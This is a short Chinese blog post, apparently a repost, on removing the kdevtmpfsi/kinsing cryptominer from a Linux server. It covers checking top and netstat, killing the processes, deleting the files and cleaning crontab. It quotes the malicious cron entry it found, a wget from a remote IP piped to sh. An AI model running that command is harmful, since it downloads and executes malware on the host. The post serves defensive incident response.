【服务器】挖矿病毒 kdevtmpfsi(一针见效)

附:尝试了许多普通kill 和 rm 操作,发现根本无法解决问题。分析原因在于定时任务为删除掉。
状态:CPU爆满,导致线上服务宕机。
图片是盗的,进程占用是真实的。

1、# top
查看cpu占用情况,找到占用cpu的进程 最后是 kdevtmpfsi

【服务器】挖矿病毒 kdevtmpfsi(一针见效)_第1张图片
2、# netstat -natp
根据上面的进程名查看与内网的 tcp 链接异常 ,看到陌生ip,查出为国外ip,估计主机被人种后门了

此时,挖矿脚本大概率定时在你的crontab里面。

crontab -l ,发现异常定时任务,* * * * * wget -q -O -http://195.3.146.118/unk.sh | sh > /dev/null 2>&1

解决办法:

top命令找到kdevtmpfsi和kinsing的进程号A和B
systemctl status 进程A

【服务器】挖矿病毒 kdevtmpfsi(一针见效)_第2张图片
rm -fr /var/tmp/kinsing 和 rm -fr /tmp/kdevtmpfsi
kill -9 进程A 和 kill -9 进程B
cd /var/spool/cron 查看是否有相关的木马定时任务在执行(root文件里面为定时任务)有的话删掉再重启下crontab(命令:systemctl restart crond.service)
后续操作:(找到文件,全部删除,若没有则无需操作)
find / -name kdevtmpfsi
find / -name kinsing

转载:https://blog.csdn.net/oYuZhongManBu1234/article/details/104281503

你可能感兴趣的:(linux,centos)